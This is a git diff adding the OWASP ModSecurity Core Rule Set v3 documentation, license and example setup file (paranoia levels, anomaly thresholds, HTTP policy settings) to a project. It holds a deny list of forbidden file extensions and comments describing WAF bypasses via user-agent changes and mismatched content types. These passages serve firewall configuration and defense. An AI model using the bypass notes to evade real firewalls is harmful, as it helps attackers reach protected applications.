default setup. + + However, testing the setup and tuning false positives + before going to production is vital. This is especially true + if you raise the paranoia level with is set to 1 by default. + Higher paranoia levels ranging from 2 to 4 include more + aggressive rules which will raise additional false positives + but also raise the security level of your service. + + If you are unsure about the performance impact of the CRS + or if you are unsure about the number of false positives, then + you may want to use the sampling percentage. This number, + which is set to 100 by default, controls the percentage + of requests which is funneled into the CRS. Fresh installs + on high traffic sites are advised to start with a low, or + very low number of percentages and raise the number + slowly up to 100. Be aware that any number below 100 allows + a random number of requests to bypass the ruleset completely. + + Update the TX policy settings for allowed Request Methods, File + Extensions, maximum numbers of arguments, etc to better reflect + your environment that is being protected. + + Make sure your GeoIP and Project Honeypot settings are specified + if you are using them. + The GeoIP database is no longer included with the CRS. Instead + you are advised to download it regularly. + + The use of Project Honeypot requires a + free API key. These require an account but can be obtained at + https://www.projecthoneypot.org/httpbl_configure.php. + + Be sure to check out the other settings present within the + crs-setup.conf file. There are many other options that have to + do with aspects of web application security that are beyond + this document but are well explained in crs-setup.conf. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS b/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS new file mode 100644 index 000000000..d8083dcc2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS @@ -0,0 +1,50 @@ +== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS == + +== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == +* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues +or the CRS Google Group at +* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project + +* There are still false positives for standard web applications in + the default install (paranoia level 1). Please report these when + you encounter them. + False Positives from paranoia level 2 rules are less interesting, + as we expect users to write exclusion rules for their alerts in + the higher paranoia levels. +* Permanent blocking of clients is based on a previous user agent / IP + combination. Changing the user agent will thus allow to bypass + this new filter. The plan is to allow for a purely IP based + filter in the future. +* Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line + configuration directives, which causes Apache to fail during startup + with an error such as: + Error parsing actions: Unknown action: \\ + Action 'configtest' failed. + This bug is known to plague RHEL/Centos 7 below v7.4 or + httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users. + https://bz.apache.org/bugzilla/show_bug.cgi?id=55910 + We advise to upgrade your Apache version. If upgrading is not possible, + we have provided a script in the util/join-multiline-rules directory + which converts the rules into a format that works around the bug. + You have to re-run this script whenever you modify or update + the CRS rules. +* Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, + which causes the following error in the Apache ErrorLog or SecAuditLog: + 'ModSecurity: JSON support was not enabled.' + JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014). + You can either use backports.debian.org to install the latest ModSecurity + release or disable rule id 200001. +* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME + type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is + indicative that XML will be provided. In accordance with this, ModSecurity's XML + Request Body Processor should also be configured to support this MIME type. Within + the ModSecurity project, commit 5e4e2af + (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) + has been merged to support this endeavour. However, if you are running a modified or + preexisting version of the modsecurity.conf provided by this repository, you may + wish to upgrade rule '200000' accordingly. The rule now appears as follows: + +``` +SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ + "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" +``` diff --git a/src/common/core/modsecurity/files/coreruleset-v3/LICENSE b/src/common/core/modsecurity/files/coreruleset-v3/LICENSE new file mode 100644 index 000000000..b671fe62a --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright 2006 the OWASP Core Rule Set contributors + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/README.md b/src/common/core/modsecurity/files/coreruleset-v3/README.md new file mode 100644 index 000000000..aa640560c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/README.md @@ -0,0 +1,34 @@ +![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) +![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) +![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) +[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) +[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + + + +# OWASP ModSecurity Core Rule Set (CRS) + +The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. + +## CRS Resources + +Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. + +## Contributing to the CRS + +We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. + +[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. + +[Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. + +[Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS. + +## License + +Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. + +Copyright (c) 2021-2022 Core Rule Set project. All rights reserved. + +The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md b/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md new file mode 100644 index 000000000..f8921987b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md @@ -0,0 +1,4 @@ +# Security Policy + +See policy here: https://github.com/coreruleset/coreruleset/blob/v4.0/dev/SECURITY.md + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md b/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md new file mode 100644 index 000000000..5cf8ab3b8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md @@ -0,0 +1,13 @@ +## GOLD SPONSORS + +* Edgio +* Google +* Microsoft +* Nginx (Part of F5) +* United Security Providers +* VMWare + +## SILVER SPONSORS + +* Bug Bounty Switzerland + diff --git a/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example b/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example new file mode 100644 index 000000000..e0b1d9cde --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example @@ -0,0 +1,869 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + + +# +# -- [[ Introduction ]] -------------------------------------------------------- +# +# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack +# detection rules that provide a base level of protection for any web +# application. They are written for the open source, cross-platform +# ModSecurity Web Application Firewall. +# +# See also: +# https://coreruleset.org/ +# https://github.com/SpiderLabs/owasp-modsecurity-crs +# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project +# + + +# +# -- [[ System Requirements ]] ------------------------------------------------- +# +# CRS requires ModSecurity version 2.8.0 or above. +# We recommend to always use the newest ModSecurity version. +# +# The configuration directives/settings in this file are used to control +# the OWASP ModSecurity CRS. These settings do **NOT** configure the main +# ModSecurity settings (modsecurity.conf) such as SecRuleEngine, +# SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing. +# +# The CRS assumes that modsecurity.conf has been loaded. It is bundled with +# ModSecurity. If you don't have it, you can get it from: +# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended +# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended +# +# The order of file inclusion in your webserver configuration should always be: +# 1. modsecurity.conf +# 2. crs-setup.conf (this file) +# 3. rules/*.conf (the CRS rule files) +# +# Please refer to the INSTALL file for detailed installation instructions. +# + + +# +# -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] --------------- +# +# The CRS can run in two modes: +# +# -- [[ Anomaly Scoring Mode (default) ]] -- +# In CRS3, anomaly mode is the default and recommended mode, since it gives the +# most accurate log information and offers the most flexibility in setting your +# blocking policies. It is also called "collaborative detection mode". +# In this mode, each matching rule increases an 'anomaly score'. +# At the conclusion of the inbound rules, and again at the conclusion of the +# outbound rules, the anomaly score is checked, and the blocking evaluation +# rules apply a disruptive action, by default returning an error 403. +# +# -- [[ Self-Contained Mode ]] -- +# In this mode, rules apply an action instantly. This was the CRS2 default. +# It can lower resource usage, at the cost of less flexibility in blocking policy +# and less informative audit logs (only the first detected threat is logged). +# Rules inherit the disruptive action that you specify (i.e. deny, drop, etc). +# The first rule that matches will execute this action. In most cases this will +# cause evaluation to stop after the first rule has matched, similar to how many +# IDSs function. +# +# -- [[ Alert Logging Control ]] -- +# In the mode configuration, you must also adjust the desired logging options. +# There are three common options for dealing with logging. By default CRS enables +# logging to the webserver error log (or Event viewer) plus detailed logging to +# the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf). +# +# - To log to both error log and ModSecurity audit log file, use: "log,auditlog" +# - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog" +# - To log *only* to the error log file, use: "log,noauditlog" +# +# Examples for the various modes follow. +# You must leave one of the following options enabled. +# Note that you must specify the same line for phase:1 and phase:2. +# + +# Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +SecDefaultAction "phase:1,log,auditlog,pass" +SecDefaultAction "phase:2,log,auditlog,pass" + +# Example: Anomaly Scoring mode, log only to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,nolog,auditlog,pass" +# SecDefaultAction "phase:2,nolog,auditlog,pass" + +# Example: Self-contained mode, return error 403 on blocking +# - In this configuration the default disruptive action becomes 'deny'. After a +# rule triggers, it will stop processing the request and return an error 403. +# - You can also use a different error status, such as 404, 406, et cetera. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,log,auditlog,deny,status:403" +# SecDefaultAction "phase:2,log,auditlog,deny,status:403" + +# Example: Self-contained mode, redirect back to homepage on blocking +# - In this configuration the 'tag' action includes the Host header data in the +# log. This helps to identify which virtual host triggered the rule (if any). +# - Note that this might cause redirect loops in some situations; for example +# if a Cookie or User-Agent header is blocked, it will also be blocked when +# the client subsequently tries to access the homepage. You can also redirect +# to another custom URL. +# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" +# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" + + +# +# -- [[ Paranoia Level Initialization ]] --------------------------------------- +# +# The Paranoia Level (PL) setting allows you to choose the desired level +# of rule checks that will add to your anomaly scores. +# +# With each paranoia level increase, the CRS enables additional rules +# giving you a higher level of security. However, higher paranoia levels +# also increase the possibility of blocking some legitimate traffic due to +# false alarms (also named false positives or FPs). If you use higher +# paranoia levels, it is likely that you will need to add some exclusion +# rules for certain requests and applications receiving complex input. +# +# - A paranoia level of 1 is default. In this level, most core rules +# are enabled. PL1 is advised for beginners, installations +# covering many different sites and applications, and for setups +# with standard security requirements. +# At PL1 you should face FPs rarely. If you encounter FPs, please +# open an issue on the CRS GitHub site and don't forget to attach your +# complete Audit Log record for the request with the issue. +# - Paranoia level 2 includes many extra rules, for instance enabling +# many regexp-based SQL and XSS injection protections, and adding +# extra keywords checked for code injections. PL2 is advised +# for moderate to experienced users desiring more complete coverage +# and for installations with elevated security requirements. +# PL2 comes with some FPs which you need to handle. +# - Paranoia level 3 enables more rules and keyword lists, and tweaks +# limits on special characters used. PL3 is aimed at users experienced +# at the handling of FPs and at installations with a high security +# requirement. +# - Paranoia level 4 further restricts special characters. +# The highest level is advised for experienced users protecting +# installations with very high security requirements. Running PL4 will +# likely produce a very high number of FPs which have to be +# treated before the site can go productive. +# +# All rules will log their PL to the audit log; +# example: [tag "paranoia-level/2"]. This allows you to deduct from the +# audit log how the WAF behavior is affected by paranoia level. +# +# It is important to also look into the variable +# tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED) +# defined below. Enabling it closes a possible bypass of CRS. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900000,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.paranoia_level=1" + + +# It is possible to execute rules from a higher paranoia level but not include +# them in the anomaly scoring. This allows you to take a well-tuned system on +# paranoia level 1 and add rules from paranoia level 2 without having to fear +# the new rules would lead to false positives that raise your score above the +# threshold. +# This optional feature is enabled by uncommenting the following rule and +# setting the tx.executing_paranoia_level. +# Technically, rules up to the level defined in tx.executing_paranoia_level +# will be executed, but only the rules up to tx.paranoia_level affect the +# anomaly scores. +# By default, tx.executing_paranoia_level is set to tx.paranoia_level. +# tx.executing_paranoia_level must not be lower than tx.paranoia_level. +# +# Please notice that setting tx.executing_paranoia_level to a higher paranoia +# level results in a performance impact that is equally high as setting +# tx.paranoia_level to said level. +# +#SecAction \ +# "id:900001,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.executing_paranoia_level=1" + + +# +# -- [[ Enforce Body Processor URLENCODED ]] ----------------------------------- +# +# ModSecurity selects the body processor based on the Content-Type request +# header. But clients are not always setting the Content-Type header for their +# request body payloads. This will leave ModSecurity with limited vision into +# the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the +# URLENCODED body processor in these situations. This is off by default, as it +# implies a change of the behaviour of ModSecurity beyond CRS (the body +# processor applies to all rules, not only CRS) and because it may lead to +# false positives already on paranoia level 1. However, enabling this variable +# closes a possible bypass of CRS so it should be considered. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900010,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" + + +# +# -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- +# +# Each rule in the CRS has an associated severity level. +# These are the default scoring points for each severity level. +# These settings will be used to increment the anomaly score if a rule matches. +# You may adjust these points to your liking, but this is usually not needed. +# +# - CRITICAL severity: Anomaly Score of 5. +# Mostly generated by the application attack rules (93x and 94x files). +# - ERROR severity: Anomaly Score of 4. +# Generated mostly from outbound leakage rules (95x files). +# - WARNING severity: Anomaly Score of 3. +# Generated mostly by malicious client rules (91x files). +# - NOTICE severity: Anomaly Score of 2. +# Generated mostly by the protocol rules (92x files). +# +# In anomaly mode, these scores are cumulative. +# So it's possible for a request to hit multiple rules. +# +# (Note: In this file, we use 'phase:1' to set CRS configuration variables. +# In general, 'phase:request' is used. However, we want to make absolutely sure +# that all configuration variables are set before the CRS rules are processed.) +# +#SecAction \ +# "id:900100,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" + + +# +# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ +# +# Here, you can specify at which cumulative anomaly score an inbound request, +# or outbound response, gets blocked. +# +# Most detected inbound threats will give a critical score of 5. +# Smaller violations, like violations of protocol/standards, carry lower scores. +# +# [ At default value ] +# If you keep the blocking thresholds at the defaults, the CRS will work +# similarly to previous CRS versions: a single critical rule match will cause +# the request to be blocked and logged. +# +# [ Using higher values ] +# If you want to make the CRS less sensitive, you can increase the blocking +# thresholds, for instance to 7 (which would require multiple rule matches +# before blocking) or 10 (which would require at least two critical alerts - or +# a combination of many lesser alerts), or even higher. However, increasing the +# thresholds might cause some attacks to bypass the CRS rules or your policies. +# +# [ New deployment strategy: Starting high and decreasing ] +# It is a common practice to start a fresh CRS installation with elevated +# anomaly scoring thresholds (>100) and then lower the limits as your +# confidence in the setup grows. You may also look into the Sampling +# Percentage section below for a different strategy to ease into a new +# CRS installation. +# +# [ Anomaly Threshold / Paranoia Level Quadrant ] +# +# High Anomaly Limit | High Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Fresh Site | -> Experimental Site +# ------------------------------------------------------ +# Low Anomaly Limit | Low Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Standard Site | -> High Security Site +# +# Uncomment this rule to change the defaults: +# +#SecAction \ +# "id:900110,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + +# +# -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- +# +# Some well-known applications may undertake actions that appear to be +# malicious. This includes actions such as allowing HTML or Javascript within +# parameters. In such cases the CRS aims to prevent false positives by allowing +# administrators to enable prebuilt, application specific exclusions on an +# application by application basis. +# These application specific exclusions are distinct from the rules that would +# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as +# they are prebuilt for specific applications. The 'REQUEST-900' file is +# designed for users to add their own custom exclusions. Note, using these +# application specific exclusions may loosen restrictions of the CRS, +# especially if used with an application they weren't designed for. As a result +# they should be applied with care. +# To use this functionality you must specify a supported application. To do so +# uncomment rule 900130. In addition to uncommenting the rule you will need to +# specify which application(s) you'd like to enable exclusions for. Only a +# (very) limited set of applications are currently supported, please use the +# filenames prefixed with 'REQUEST-903' to guide you in your selection. +# Such filenames use the following convention: +# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf +# +# It is recommended if you run multiple web applications on your site to limit +# the effects of the exclusion to only the path where the excluded webapp +# resides using a rule similar to the following example: +# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 + +# +# Modify and uncomment this rule to select which application: +# +#SecAction \ +# "id:900130,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_exclusions_cpanel=1,\ +# setvar:tx.crs_exclusions_drupal=1,\ +# setvar:tx.crs_exclusions_dokuwiki=1,\ +# setvar:tx.crs_exclusions_nextcloud=1,\ +# setvar:tx.crs_exclusions_wordpress=1,\ +# setvar:tx.crs_exclusions_xenforo=1" + +# +# -- [[ HTTP Policy Settings ]] ------------------------------------------------ +# +# This section defines your policies for the HTTP protocol, such as: +# - allowed HTTP versions, HTTP methods, allowed request Content-Types +# - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy) +# +# These variables are used in the following rule files: +# - REQUEST-911-METHOD-ENFORCEMENT.conf +# - REQUEST-912-DOS-PROTECTION.conf +# - REQUEST-920-PROTOCOL-ENFORCEMENT.conf + +# HTTP methods that a client is allowed to use. +# Default: GET HEAD POST OPTIONS +# Example: for RESTful APIs, add the following methods: PUT PATCH DELETE +# Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK +# MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK +# Uncomment this rule to change the default. +#SecAction \ +# "id:900200,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# Content-Types that a client is allowed to send in a request. +# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| +# |text/xml| |application/xml| |application/soap+xml| |application/json| +# |application/cloudevents+json| |application/cloudevents-batch+json| +# +# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator +# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom +# Content-Type with lowercase. +# +# Bypass Warning: some applications may not rely on the content-type request header in order +# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML +# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any +# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) +# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" +# content type may still be interpreted as JSON by a backend application but would not trigger the +# JSON body parser at the WAF, leading to a bypass. +# +# To prevent blocking request with not allowed content-type by default, you can create an exclusion +# rule that removes rule 920420. For example: +# SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ +# "id:1234,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# ctl:ruleRemoveById=920420,\ +# chain" +# SecRule REQUEST_URI "@rx ^/foo/bar" "t:none" +# +# Uncomment this rule to change the default. +# +#SecAction \ +# "id:900220,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" + +# Allowed HTTP versions. +# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so +# we include both version strings by default. +# Uncomment this rule to change the default. +#SecAction \ +# "id:900230,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + +# Forbidden file extensions. +# Guards against unintended exposure of development/configuration files. +# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ 